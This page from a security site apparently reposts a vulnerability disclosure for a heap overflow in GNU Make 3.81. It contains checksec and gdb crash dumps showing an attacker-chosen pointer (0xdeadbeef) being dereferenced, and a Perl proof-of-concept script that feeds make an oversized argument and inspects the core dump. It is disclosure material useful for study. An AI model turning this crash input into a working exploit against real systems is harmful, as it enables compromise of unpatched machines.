首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Make 3.81 - Heap Overflow PoC
来源:vfocus.net 作者:HyP 发布时间:2014-07-25  
=for comment
# Exploit Title: MAKE Heap Overflow - Pointer dereferencing POC (Calloc)-X86 X64
# Date: [14.07.14]
# Exploit Author: HyP
# Vendor Homepage: http://www.gnu.org/software/make/
# Software Link: http://ftp.gnu.org/gnu/make/
# Version: Make 3.81
# Tested on: linux32,64 bits (Fedora,Debian,ubuntu,Arch)
# CVE : none
  
*******************************************************************************************
Special Thanks:
  
kmkz
Zadyree
Sec0d Team
  
*******************************************************************************************
*******************************************************************************************
32bits
  
  
./checksec.sh --file make
RELRO STACK CANARY NX PIE RPATH
RUNPATH FILE
No RELRO No canary found NX enabled No PIE No RPATH
No RUNPATH make
  
  
gdb-peda$ r `perl -e 'print "A" x 4000 . "B"x96 . "\xef\xbe\xad\xde"x4'`
  
  
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
...
EAX: 0xdeadbeef
EBX: 0x807b971 --> 0x6f2e ('.o')
ECX: 0x0
EDX: 0x1
ESI: 0xdeadbeef
EDI: 0x0
EBP: 0xbfffc5e8 --> 0xbfffc698 --> 0x8081de0 --> 0x0
ESP: 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')
EIP: 0x80548b2 (mov eax,DWORD PTR [eax])
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction
overflow)
[-------------------------------------code-------------------------------------]
0x80548aa: je 0x80548b8
0x80548ac: lea esi,[esi+eiz*1+0x0]
0x80548b0: mov esi,eax
=> 0x80548b2: mov eax,DWORD PTR [eax] <------ Pointer Dereferencing
0x80548b4: test eax,eax
0x80548b6: jne 0x80548b0
0x80548b8: cmp DWORD PTR [ebp-0x1034],0x1
0x80548bf: mov DWORD PTR [ebp-0x10ac],edx
[------------------------------------stack-------------------------------------]
0000| 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')
0004| 0xbfffa314 --> 0x807b971 --> 0x6f2e ('.o')
0008| 0xbfffa318 --> 0x2
0012| 0xbfffa31c --> 0xb7ffadf8 ("symbol=%s; lookup in file=%s [%lu]\n")
0016| 0xbfffa320 --> 0x0
0020| 0xbfffa324 --> 0x0
0024| 0xbfffa328 --> 0x0
0028| 0xbfffa32c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x080548b2 in ?? ()
  
  
Overflow code:
...
80548aa: 74 0c je 80548b8 <calloc@plt+0xac38>
80548ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
80548b0: 89 c6 mov %eax,%esi
80548b2: 8b 00 mov (%eax),%eax
80548b4: 85 c0 test %eax,%eax
80548b6: 75 f8 jne 80548b0 <calloc@plt+0xac30>
...
  
  
gdb-peda$ x/x $eax
0x807ff68: 0x00000000
  
peda vmmap
Start End Perm Name
0x08048000 0x0806f000 r-xp /root/Desktop/RESEARCH/make_BoF/make
0x0806f000 0x08070000 rw-p /root/Desktop/RESEARCH/make_BoF/make
  
0x08070000 0x08092000 rw-p [heap] // heap overflow !!
  
  
  
*******************************************************************************************
*******************************************************************************************
64bits
  
  
Overflow Code :
40cc59: 74 10 je 40cc6b <__ctype_b_loc@plt+0xa52b>
40cc5b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
40cc60: 48 89 c3 mov rbx,rax
40cc63: 48 8b 00 mov rax,QWORD PTR [rax] // heap overflow
  
  
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0xdeadbeefdeadbeef
RBX: 0xdeadbeefdeadbeef
RCX: 0x4242424242424242 ('BBBBBBBB')
RDX: 0x0
RSI: 0x7fffffff97d0 ('A' <repeats 200 times>...)
RDI: 0x7fffffffa7e2 --> 0x732e656c69666500 ('')
RBP: 0x7fffffffb930 --> 0x1
RSP: 0x7fffffff95f0 --> 0x0
RIP: 0x40cc63 (mov rax,QWORD PTR [rax])
R8 : 0x4242424242424242 ('BBBBBBBB')
R9 : 0x7ffff7972440 (mov dx,WORD PTR [rsi-0x2])
R10: 0x4242424242424242 ('BBBBBBBB')
R11: 0x7ffff799f990 --> 0xfffd28d0fffd2708
R12: 0x1
R13: 0x0
R14: 0x6397a0 --> 0x6f2e25 ('%.o')
R15: 0x0
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction
overflow)
[-------------------------------------code-------------------------------------]
0x40cc59: je 0x40cc6b
0x40cc5b: nop DWORD PTR [rax+rax*1+0x0]
0x40cc60: mov rbx,rax
=> 0x40cc63: mov rax,QWORD PTR [rax] <----- Pointer dereferencing
0x40cc66: test rax,rax
0x40cc69: jne 0x40cc60
0x40cc6b: cmp DWORD PTR [rbp-0x105c],0x1
0x40cc72: lea rdi,[rbp-0x40]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffff95f0 --> 0x0
0008| 0x7fffffff95f8 --> 0x0
0016| 0x7fffffff9600 --> 0x0
0024| 0x7fffffff9608 --> 0x645e50 --> 0x646630 --> 0x64667b -->
0x5f7266006362696c ('libc')
0032| 0x7fffffff9610 --> 0xffffffdf
0040| 0x7fffffff9618 --> 0x645e58 --> 0x6462f0 --> 0x64a500 --> 0x64a541
--> 0x5f726600656b616d ('make')
0048| 0x7fffffff9620 --> 0x7ffff7bd01f8 --> 0x645e50 --> 0x646630 -->
0x64667b --> 0x5f7266006362696c ('libc')
0056| 0x7fffffff9628 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040cc63 in ?? ()
  
  
  
*******************************************************************************************
*******************************************************************************************
Proof of Concept - Source code
*******************************************************************************************
*******************************************************************************************
=cut
  
#!/usr/bin/perl
  
use 5.010;
use strict;
use warnings;
say "Please set ulimit value to 1000 before (ulimit -c 1000) ";
sleep 0.5;
  
  
my $buff = "A"x 4096 ;
my $addr = "\xef\xbe\xad\xde";
my $make = "./make";
my $gdb = "gdb --core core";
my $PAYLOAD= (`perl -e 'print "$buff" . "$addr" '`);
  
my $exec= qx($make $PAYLOAD);
  
say " Reading Core file GDB ";
sleep 0.5;
  
system ($gdb);

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BulletProof FTP Client 2010 -
·MQAC.sys Arbitrary Write Privi
·Omeka 2.2.1 - Remote Code Exec
·Pligg 2.0.1 - Multiple Vulnera
·Apache 2.4.x mod_proxy Denial
·Oxwall 1.7.0 - Remote Code Exe
·DjVuLibre <= 3.5.25.3 - Out of
·SkaDate Lite 2.0 - Remote Code
·Kolibri WebServer 2.0 - GET Re
·D-Link AP 3200 Multiple Vulner
·Microsoft XP SP3 MQAC.sys Arbi
·Microsoft XP SP3 BthPan.sys Ar
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved